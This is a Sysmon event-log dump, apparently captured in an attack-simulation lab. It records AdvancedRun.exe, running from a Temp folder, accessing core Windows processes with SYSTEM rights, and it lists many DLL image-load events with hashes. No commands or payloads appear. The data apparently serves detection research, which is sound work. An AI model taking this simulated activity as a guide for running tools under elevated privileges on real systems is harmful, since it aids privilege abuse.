20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077138Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077137Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004077136Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.191{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004077135Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.190{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077134Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.174{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004077133Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.164{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077132Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.158{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077131Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.157{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077130Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.156{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077129Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.156{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.156{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.154{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.154{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.153{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.153{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.153{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.151{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.150{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.150{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.150{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.150{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.150{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.149{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.149{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.149{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.148{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.148{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.148{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.148{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.146{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.147{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.145{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.143{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.143{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.142{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.141{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004077102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.141{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 